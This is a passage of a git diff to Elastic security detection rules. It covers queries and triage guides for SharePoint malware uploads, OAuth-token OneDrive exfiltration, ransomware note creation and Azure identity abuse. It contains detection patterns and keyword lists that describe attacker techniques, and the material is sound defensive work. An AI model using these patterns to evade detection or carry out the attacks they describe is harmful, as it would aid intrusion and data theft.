While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating SharePoint Malware File Upload\n\nSharePoint, a collaborative platform, facilitates file sharing and storage within organizations. Adversaries exploit this by uploading malware, leveraging the platform's sharing capabilities to propagate threats laterally. The detection rule identifies when SharePoint's file scanning engine flags an upload as malicious, focusing on specific audit events to alert security teams of potential lateral movement threats.\n\n### Possible investigation steps\n\n- Review the specific event details in the alert, focusing on the event.dataset, event.provider, event.code, and event.action fields to confirm the alert is related to a SharePoint file upload flagged as malware.\n- Identify the user account associated with the file upload by examining the audit logs and determine if the account has a history of suspicious activity or if it has been compromised.\n- Analyze the file metadata, including the file name, type, and size, to gather more context about the nature of the uploaded file and assess its potential impact.\n- Check the file's sharing permissions and access history to identify other users or systems that may have interacted with the file, assessing the risk of lateral movement.\n- Investigate the source of the file upload, such as the originating IP address or device, to determine if it aligns with known malicious activity or if it is an anomaly for the user.\n- Coordinate with the IT team to isolate affected systems or accounts if necessary, and initiate a response plan to mitigate any potential spread of the malware within the organization.\n\n### False positive analysis\n\n- Legitimate software updates or patches uploaded to SharePoint may be flagged as malware. To handle this, create exceptions for known update files by verifying their source and hash.\n- Internal security tools or scripts used for testing purposes might trigger false positives. Maintain a list of these tools and exclude them from alerts after confirming their legitimacy.\n- Files with encrypted content, such as password-protected documents, can be mistakenly identified as malicious. Implement a process to review and whitelist these files if they are from trusted sources.\n- Large batch uploads from trusted departments, like IT or HR, may occasionally be flagged. Establish a review protocol for these uploads and whitelist them if they are verified as safe.\n- Files with macros or executable content used in legitimate business processes might be detected. Work with relevant departments to identify and exclude these files from alerts after thorough validation.\n\n### Response and remediation\n\n- Immediately isolate the affected SharePoint site or library to prevent further access and sharing of the malicious file. This can be done by restricting permissions or temporarily disabling access to the site.\n- Notify the security operations team and relevant stakeholders about the detected malware to ensure awareness and initiate a coordinated response.\n- Quarantine the identified malicious file to prevent it from being accessed or executed by users. Use SharePoint's built-in capabilities or integrated security tools to move the file to a secure location.\n- Conduct a thorough scan of the affected SharePoint site and connected systems to identify any additional malicious files or indicators of compromise. 
Use advanced threat detection tools to ensure comprehensive coverage.\n- Review and revoke any unauthorized access or sharing permissions that may have been granted to the malicious file, ensuring that only legitimate users have access to sensitive data.\n- Escalate the incident to the incident response team if there are signs of lateral movement or if the malware has spread to other parts of the network, following the organization's escalation protocols.\n- Implement enhanced monitoring and logging for SharePoint and related services to detect any future attempts to upload or share malicious files, leveraging the specific query fields used in the detection rule.", - "query": "event.dataset:o365.audit and event.provider:SharePoint and event.code:SharePointFileOperation and event.action:FileMalwareDetected\n", - "references": [ - "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/virus-detection-in-spo?view=o365-worldwide" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "0e52157a-8e96-4a95-a6e3-5faae5081a74", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Tactic: Lateral Movement", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1080", - "name": "Taint Shared Content", - "reference": "https://attack.mitre.org/techniques/T1080/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "0e52157a-8e96-4a95-a6e3-5faae5081a74_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json deleted file mode 100644 index 71d41ac11f4..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_1.json +++ /dev/null @@ -1,65 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an excessive number of files are downloaded from OneDrive using OAuth authentication. Adversaries may conduct phishing campaigns to steal OAuth tokens and impersonate users. These access tokens can then be used to download files from OneDrive.", - "false_positives": [ - "Legitimate users may download files from OneDrive using OAuth authentication. Ensure that the downloads are authorized and the user is known before taking action." - ], - "from": "now-9m", - "language": "esql", - "license": "Elastic License v2", - "name": "M365 OneDrive Excessive File Downloads with OAuth Token", - "note": "## Triage and Analysis\n\n### Investigating M365 OneDrive Excessive File Downloads with OAuth Token\n\nThis rule detects an excessive number of files downloaded from OneDrive using OAuth authentication. 
Threat actors may use OAuth phishing attacks, such as **Device Code Authentication phishing**, to obtain valid access tokens and perform unauthorized data exfiltration. This method allows adversaries to bypass traditional authentication mechanisms, making it a stealthy and effective technique.\n\nThis rule leverages ES|QL aggregations which limit the field values available in the alert document. To investigate further, it is recommended to identify the original documents ingested.\n\n#### Possible Investigation Steps\n\n- Review the `o365.audit.UserId` field to identify the user who performed the downloads. Check if this user typically downloads large amounts of data from OneDrive.\n- Correlate `o365.audit.UserId` with Entra Sign-In logs to verify the authentication method used and determine if it was expected for this user.\n- Review the authentication method used. If OAuth authentication was used, investigate whether it was expected for this user.\n- Identify the client application used for authentication. Determine if it is a legitimate enterprise-approved app or an unauthorized third-party application.\n- Check the number of unique files downloaded. If a user downloads a high volume of unique files in a short period, it may indicate data exfiltration.\n- Analyze the file types and directories accessed to determine if sensitive or confidential data was involved.\n- Investigate the source IP address and geolocation of the download activity. If it originates from an unusual or anonymized location, further scrutiny is needed.\n- Review other recent activities from the same user, such as file access, sharing, or permission changes, that may indicate further compromise.\n- Check for signs of session persistence using OAuth. If Azure sign-in logs are correlated where `authentication_protocol` or `originalTransferMethod` field shows `deviceCode`, the session was established through device code authentication.\n- Look for multiple authentication attempts from different devices or locations within a short timeframe, which could indicate unauthorized access.\n- Investigate if other OAuth-related anomalies exist, such as consent grants for unfamiliar applications or unexpected refresh token activity.\n- Review the `file.directory` value from the original documents to identify the specific folders or paths where the files were downloaded.\n\n### False Positive Analysis\n\n- Verify if the user regularly downloads large batches of files as part of their job function.\n- Determine if the downloads were triggered by an authorized automated process, such as a data backup or synchronization tool.\n- Confirm if the detected OAuth application is approved for enterprise use and aligns with expected usage patterns.\n\n### Response and Remediation\n\n- If unauthorized activity is confirmed, revoke the OAuth token used and terminate active OneDrive sessions.\n- Reset the affected user's password and require reauthentication to prevent continued unauthorized access.\n- Restrict OAuth app permissions and enforce conditional access policies to limit authentication to trusted devices and applications.\n- Monitor for additional signs of compromise, such as unusual email forwarding rules, external sharing of OneDrive files, or privilege escalation attempts.\n- Educate users on OAuth phishing risks and encourage the use of **Microsoft Defender for Office 365 Safe Links** to mitigate credential-based attacks.\n- Enable continuous monitoring for OAuth authentication anomalies using **Microsoft Entra ID sign-in logs** 
and security tools.\n", - "query": "FROM logs-o365.audit-*\n| WHERE @timestamp > now() - 14 day\n| WHERE\n event.dataset == \"o365.audit\" and\n\n // filter on files downloaded from OneDrive\n event.provider == \"OneDrive\" and\n event.action == \"FileDownloaded\" and\n\n // filter on OAuth authentication which encompasses device code workflow\n o365.audit.AuthenticationType == \"OAuth\"\n and event.outcome == \"success\"\n// bucket authentication attempts by 1 minute\n| EVAL target_time_window = DATE_TRUNC(1 minutes, @timestamp)\n| KEEP target_time_window, o365.audit.UserId, file.name, source.ip\n\n// aggregate on unique file names and download attempts\n| STATS unique_file_count = count_distinct(file.name), download_attempt_count = count(*) BY target_time_window, o365.audit.UserId, source.ip\n\n// adjustable range for \"excessive\" unique files that were downloaded\n| WHERE unique_file_count >= 25\n", - "references": [ - "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" - ], - "risk_score": 47, - "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Domain: SaaS", - "Data Source: Microsoft 365", - "Data Source: SharePoint", - "Data Source: OneDrive", - "Use Case: Threat Detection", - "Tactic: Collection", - "Tactic: Exfiltration", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0009", - "name": "Collection", - "reference": "https://attack.mitre.org/tactics/TA0009/" - }, - "technique": [ - { - "id": "T1530", - "name": "Data from Cloud Storage", - "reference": "https://attack.mitre.org/techniques/T1530/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0010", - "name": "Exfiltration", - "reference": "https://attack.mitre.org/tactics/TA0010/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json index 505838b9601..9ea64e1df40 100644 --- a/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json +++ b/packages/security_detection_engine/kibana/security_rule/0e524fa6-eed3-11ef-82b4-f661ea17fbce_4.json @@ -17,6 +17,12 @@ "references": [ "https://www.volexity.com/blog/2025/02/13/multiple-russian-threat-actors-targeting-microsoft-device-code-authentication/" ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], "risk_score": 47, "rule_id": "0e524fa6-eed3-11ef-82b4-f661ea17fbce", "severity": "medium", diff --git a/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json b/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json deleted file mode 100644 index e2e7ecd12f3..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208.json +++ /dev/null @@ -1,136 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "This rule identifies a high number (20) of file creation event by the System virtual process from the same host and with same file name containing keywords similar 
to ransomware note files and all within a short time period.", - "from": "now-9m", - "index": [ - "logs-endpoint.events.file-*", - "winlogbeat-*", - "logs-windows.sysmon_operational-*", - "endgame-*", - "logs-m365_defender.event-*", - "logs-sentinel_one_cloud_funnel.*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Potential Ransomware Behavior - High count of Readme files by System", - "note": "## Triage and analysis\n\n#### Possible investigation steps\n\n- Investigate the content of the readme files.\n- Investigate any file names with unusual extensions.\n- Investigate any incoming network connection to port 445 on this host.\n- Investigate any network logon events to this host.\n- Identify the total number and type of modified files by pid 4.\n- If the number of files is too high and source.ip connecting over SMB is unusual isolate the host and block the used credentials.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- Local file modification from a Kernel mode driver.\n\n### Related rules\n\n- Third-party Backup Files Deleted via Unexpected Process - 11ea6bec-ebde-4d71-a8e9-784948f8e3e9\n- Volume Shadow Copy Deleted or Resized via VssAdmin - b5ea4bfe-a1b2-421f-9d47-22a75a6f2921\n- Volume Shadow Copy Deletion via PowerShell - d99a037b-c8e2-47a5-97b9-170d076827c4\n- Volume Shadow Copy Deletion via WMIC - dc9c1f74-dac3-48e3-b47f-eb79db358f57\n- Potential Ransomware Note File Dropped via SMB - 02bab13d-fb14-4d7c-b6fe-4a28874d37c5\n- Suspicious File Renamed via SMB - 78e9b5d5-7c07-40a7-a591-3dbbf464c386\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Consider isolating the involved host to prevent destructive behavior, which is commonly associated with this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- If any other destructive action was identified on the host, it is recommended to prioritize the investigation and look for ransomware preparation and execution activities.\n- If any backups were affected:\n - Perform data recovery locally or restore the backups from replicated copies (cloud, other servers, etc.).\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "event.category:file and host.os.type:windows and process.pid:4 and event.action:creation and\n file.name:(*read*me* or *README* or *lock* or *LOCK* or *how*to* or *HOW*TO* or *@* or *recover* or *RECOVER* or *decrypt* or *DECRYPT* or *restore* or *RESTORE* or *FILES_BACK* or *files_back*)\n", - "references": [ - "https://news.sophos.com/en-us/2023/12/21/akira-again-the-ransomware-that-keeps-on-taking/" - ], - "related_integrations": [ - { - "package": "endpoint", - "version": "^9.0.0" - }, - { - "package": "windows", - "version": "^2.5.0" - }, - { - "package": "m365_defender", - "version": "^2.22.0" - }, - { - "package": "sentinel_one_cloud_funnel", - "version": "^1.9.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.category", - "type": "keyword" - }, - { - "ecs": true, - "name": "file.name", - "type": "keyword" - }, - { - "ecs": true, - "name": "host.os.type", - "type": "keyword" - }, - { - "ecs": true, - "name": "process.pid", - "type": "long" - } - ], - "risk_score": 73, - "rule_id": "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a", - "severity": "high", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Impact", - "Resources: Investigation Guide", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Microsoft Defender for Endpoint", - "Data Source: Sysmon", - "Data Source: SentinelOne" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1485", - "name": "Data Destruction", - "reference": "https://attack.mitre.org/techniques/T1485/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0008", - "name": "Lateral Movement", - "reference": "https://attack.mitre.org/tactics/TA0008/" - }, - "technique": [ - { - "id": "T1021", - "name": "Remote Services", - "reference": "https://attack.mitre.org/techniques/T1021/", - "subtechnique": [ - { - "id": "T1021.002", - "name": "SMB/Windows Admin Shares", - "reference": "https://attack.mitre.org/techniques/T1021/002/" - } - ] - } - ] - } - ], - "threshold": { - "field": [ - "host.id", - "file.name" - ], - "value": 20 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 208 - }, - "id": "1397e1b9-0c90-4d24-8d7b-80598eb9bc9a_208", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json b/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json deleted file mode 100644 index fb1dd4a047c..00000000000 --- 
a/packages/security_detection_engine/kibana/security_rule/141e9b3a-ff37-4756-989d-05d7cbf35b0e_103.json +++ /dev/null @@ -1,100 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies an invitation to an external user in Azure Active Directory (AD). Azure AD is extended to include collaboration, allowing you to invite people from outside your organization to be guest users in your cloud account. Unless there is a business need to provision guest access, it is best practice to avoid creating guest users. Guest users could be overlooked indefinitely, leading to a potential vulnerability.", - "false_positives": [ - "Guest user invitations may be sent out by a system or network administrator. Verify whether the username, hostname, and/or resource name should be making changes in your environment. Guest user invitations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure External Guest User Invitation", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure External Guest User Invitation\n\nAzure Active Directory (AD) facilitates collaboration by allowing external users to be invited as guest users, enhancing flexibility in cloud environments. However, adversaries may exploit this feature to gain unauthorized access, posing security risks. The detection rule monitors audit logs for successful external user invitations, flagging potential misuse by identifying unusual or unnecessary guest account creations.\n\n### Possible investigation steps\n\n- Review the audit logs to confirm the details of the invitation event, focusing on the operation name \"Invite external user\" and ensuring the event outcome is marked as Success.\n- Identify the inviter by examining the properties of the audit log entry, such as the initiator's user ID or email, to determine if the invitation was expected or authorized.\n- Check the display name and other attributes of the invited guest user to assess if they align with known business needs or if they appear suspicious or unnecessary.\n- Investigate the inviter's recent activity in Azure AD to identify any unusual patterns or deviations from their typical behavior that might indicate compromised credentials.\n- Consult with relevant business units or stakeholders to verify if there was a legitimate business requirement for the guest user invitation and if it aligns with current projects or collaborations.\n- Review the access permissions granted to the guest user to ensure they are limited to the minimum necessary for their role and do not expose sensitive resources.\n\n### False positive analysis\n\n- Invitations for legitimate business partners or vendors may trigger alerts. Regularly review and whitelist known partners to prevent unnecessary alerts.\n- Internal users with dual roles or responsibilities that require external access might be flagged. 
Maintain a list of such users and update it periodically to exclude them from alerts.\n- Automated systems or applications that require guest access for integration purposes can cause false positives. Identify these systems and configure exceptions in the monitoring rules.\n- Temporary projects or collaborations often involve inviting external users. Document these projects and set expiration dates for guest access to minimize false positives.\n- Frequent invitations from specific departments, such as HR or Marketing, for events or collaborations can be common. Establish a process to verify and approve these invitations to reduce false alerts.\n\n### Response and remediation\n\n- Immediately disable the guest user account identified in the alert to prevent any unauthorized access or activities.\n- Review the audit logs to determine the source and context of the invitation, identifying the user or system that initiated the guest invitation.\n- Notify the security team and relevant stakeholders about the unauthorized guest invitation for further investigation and potential escalation.\n- Conduct a security assessment of the affected Azure AD environment to identify any other unauthorized guest accounts or suspicious activities.\n- Implement conditional access policies to restrict guest user invitations to authorized personnel only, reducing the risk of future unauthorized invitations.\n- Enhance monitoring and alerting for guest user invitations by integrating with a Security Information and Event Management (SIEM) system to ensure timely detection and response.\n- Review and update the organization's Azure AD guest user policies to ensure they align with security best practices and business needs, minimizing unnecessary guest access.", - "query": "event.dataset:azure.auditlogs and azure.auditlogs.operation_name:\"Invite external user\" and azure.auditlogs.properties.target_resources.*.display_name:guest and event.outcome:(Success or success)\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/governance/policy/samples/cis-azure-1-1-0" - ], - "related_integrations": [ - { - "package": "azure", - "version": "^1.0.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.auditlogs.operation_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.auditlogs.properties.target_resources.*.display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e", - "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Tactic: Initial Access", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - }, - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - 
"timestamp_override": "event.ingested", - "type": "query", - "version": 103 - }, - "id": "141e9b3a-ff37-4756-989d-05d7cbf35b0e_103", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json b/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json deleted file mode 100644 index 39d2e9bbbd2..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/14fa0285-fe78-4843-ac8e-f4b481f49da9_1.json +++ /dev/null @@ -1,113 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies login activity where the Visual Studio Code `client_id` is used in combination with a resourceDisplayName containing `Microsoft Graph`. This may indicate an attempt to authenticate via Visual Studio Code phishing.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure.activitylogs-*", - "logs-azure.signinlogs-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Suspicious Azure Sign-in via Visual Studio Code", - "note": "## Triage and analysis\n\n### Investigating Suspicious Azure Sign-in via Visual Studio Code\n\n### Possible investigation steps\n\n- Identify the source IP address from which the failed login attempts originated by reviewing `source.ip`. Determine if the IP is associated with known malicious activity using threat intelligence sources or if it belongs to a corporate VPN, proxy, or automation process.\n- Analyze affected user accounts by reviewing `azure.signinlogs.properties.user_principal_name` to determine if they belong to privileged roles or high-value users. Look for patterns indicating multiple failed attempts across different users, which could suggest a password spraying attempt.\n- Examine the authentication method used in `azure.signinlogs.properties.authentication_details` to identify which authentication protocols were attempted and why they failed. Legacy authentication methods may be more susceptible to brute-force attacks.\n- Review the authentication error codes found in `azure.signinlogs.properties.status.error_code` to understand why the login attempts failed. Common errors include `50126` for invalid credentials, `50053` for account lockouts, `50055` for expired passwords, and `50056` for users without a password.\n- Correlate failed logins with other sign-in activity by looking at `event.outcome`. Identify if there were any successful logins from the same user shortly after multiple failures or if there are different geolocations or device fingerprints associated with the same account.\n- Review `azure.signinlogs.properties.app_id` to identify which applications were initiating the authentication attempts. Determine if these applications are Microsoft-owned, third-party, or custom applications and if they are authorized to access the resources.\n- Check for any conditional access policies that may have been triggered by the failed login attempts by reviewing `azure.signinlogs.properties.authentication_requirement`. 
This can help identify if the failed attempts were due to policy enforcement or misconfiguration.\n\n## False positive analysis\n\n### Common benign scenarios\n- Automated scripts or applications using non-interactive authentication may trigger this detection, particularly if they rely on legacy authentication protocols recorded in `azure.signinlogs.properties.authentication_protocol`.\n- Corporate proxies or VPNs may cause multiple users to authenticate from the same IP, appearing as repeated failed attempts under `source.ip`.\n- User account lockouts from forgotten passwords or misconfigured applications may show multiple authentication failures in `azure.signinlogs.properties.status.error_code`.\n\n### How to reduce false positives\n- Exclude known trusted IPs, such as corporate infrastructure, from alerts by filtering `source.ip`.\n- Exclude known custom applications from `azure.signinlogs.properties.app_id` that are authorized to use non-interactive authentication.\n- Ignore principals with a history of failed logins due to legitimate reasons, such as expired passwords or account lockouts, by filtering `azure.signinlogs.properties.user_principal_name`.\n- Correlate sign-in failures with password reset events or normal user behavior before triggering an alert.\n\n## Response and remediation\n\n### Immediate actions\n- Block the source IP address in `source.ip` if determined to be malicious.\n- Reset passwords for all affected user accounts listed in `azure.signinlogs.properties.user_principal_name` and enforce stronger password policies.\n- Ensure basic authentication is disabled for all applications using legacy authentication protocols listed in `azure.signinlogs.properties.authentication_protocol`.\n- Enable multi-factor authentication (MFA) for impacted accounts to mitigate credential-based attacks.\n- Review Conditional Access policies to ensure they are correctly configured to enforce risk-based authentication and block unauthorized access attempts recorded in `azure.signinlogs.properties.authentication_requirement`.\n\n### Long-term mitigation\n- Implement a zero-trust security model by enforcing least privilege access and continuous authentication.\n- Regularly review and update conditional access policies to ensure they are effective against evolving threats.\n- Restrict the use of legacy authentication protocols by disabling authentication methods listed in `azure.signinlogs.properties.client_app_used`.\n- Regularly audit authentication logs in `azure.signinlogs` to detect abnormal login behavior and ensure early detection of potential attacks.\n- Regularly rotate client credentials and secrets for applications using non-interactive authentication to reduce the risk of credential theft.\n", - "query": "event.dataset:(\"azure.signinlogs\" or \"azure.activitylogs\") and \nevent.action : \"Sign-in activity\" and event.outcome:(success or Success) and \n(azure.activitylogs.properties.resourceDisplayName : \"Microsoft Graph\" or azure.signinlogs.properties.resource_display_name : \"Microsoft Graph\") and \n(azure.signinlogs.properties.app_id : \"aebc6443-996d-45c2-90f0-388ff96faa56\" or azure.signinlogs.properties.app_display_name : \"Visual Studio Code\" or \n azure.activitylogs.properties.appDisplayName : \"Visual Studio Code\" or azure.activitylogs.properties.appId : \"aebc6443-996d-45c2-90f0-388ff96faa56\")\n", - "references": [ - 
"https://docs.microsoft.com/en-us/azure/active-directory/reports-monitoring/reference-azure-monitor-sign-ins-log-schema", - "https://www.volexity.com/blog/2025/04/22/phishing-for-codes-russian-threat-actors-target-microsoft-365-oauth-workflows/" - ], - "related_integrations": [ - { - "integration": "activitylogs", - "package": "azure", - "version": "^1.22.0" - }, - { - "package": "azure", - "version": "^1.22.0" - } - ], - "required_fields": [ - { - "ecs": false, - "name": "azure.activitylogs.properties.appDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.appId", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.activitylogs.properties.resourceDisplayName", - "type": "unknown" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.app_display_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.app_id", - "type": "keyword" - }, - { - "ecs": false, - "name": "azure.signinlogs.properties.resource_display_name", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "14fa0285-fe78-4843-ac8e-f4b481f49da9", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Azure", - "Use Case: Identity and Access Audit", - "Resources: Investigation Guide", - "Tactic: Initial Access" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0001", - "name": "Initial Access", - "reference": "https://attack.mitre.org/tactics/TA0001/" - }, - "technique": [ - { - "id": "T1078", - "name": "Valid Accounts", - "reference": "https://attack.mitre.org/techniques/T1078/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 1 - }, - "id": "14fa0285-fe78-4843-ac8e-f4b481f49da9_1", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json b/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json deleted file mode 100644 index 4151286dbdf..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/16280f1e-57e6-4242-aa21-bb4d16f13b2f_103.json +++ /dev/null @@ -1,64 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure Automation runbook to execute malicious code and maintain persistence in their target's environment.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-azure*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Azure Automation Runbook Created or Modified", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Azure Automation Runbook Created or Modified\n\nAzure Automation Runbooks are scripts that automate tasks in cloud environments, enhancing operational efficiency. However, adversaries can exploit them to execute unauthorized code and maintain persistence. 
The detection rule monitors specific Azure activity logs for runbook creation or modification events, flagging successful operations to identify potential misuse. This helps in early detection of malicious activities, ensuring cloud security.\n\n### Possible investigation steps\n\n- Review the Azure activity logs to identify the specific runbook that was created or modified, focusing on the operation names: \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/DRAFT/WRITE\", \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/WRITE\", or \"MICROSOFT.AUTOMATION/AUTOMATIONACCOUNTS/RUNBOOKS/PUBLISH/ACTION\".\n- Check the event.outcome field to confirm the operation was successful, as indicated by the values \"Success\" or \"success\".\n- Identify the user or service principal that performed the operation by examining the relevant user identity fields in the activity logs.\n- Investigate the content and purpose of the runbook by reviewing its script or configuration to determine if it contains any unauthorized or suspicious code.\n- Correlate the runbook activity with other security events or alerts in the environment to identify any patterns or related malicious activities.\n- Verify if the runbook changes align with recent legitimate administrative activities or if they were unexpected, which could indicate potential misuse.\n\n### False positive analysis\n\n- Routine updates or maintenance activities by authorized personnel can trigger alerts. To manage this, create exceptions for known maintenance windows or specific user accounts that regularly perform these tasks.\n- Automated deployment processes that include runbook creation or modification might be flagged. Identify and exclude these processes by tagging them with specific identifiers in the logs.\n- Integration with third-party tools that modify runbooks as part of their normal operation can result in false positives. Work with your IT team to whitelist these tools or their associated accounts.\n- Frequent testing or development activities in non-production environments may cause alerts. Consider setting up separate monitoring rules or thresholds for these environments to reduce noise.\n- Scheduled runbook updates for compliance or policy changes can be mistaken for suspicious activity. Document these schedules and adjust the detection rule to account for them, possibly by excluding specific operation names during these times.\n\n### Response and remediation\n\n- Immediately isolate the affected Azure Automation account to prevent further unauthorized runbook executions. This can be done by disabling the account or restricting its permissions temporarily.\n- Review the modified or newly created runbooks to identify any malicious code or unauthorized changes. Remove or revert any suspicious modifications to ensure the integrity of the automation scripts.\n- Conduct a thorough audit of recent activities associated with the affected 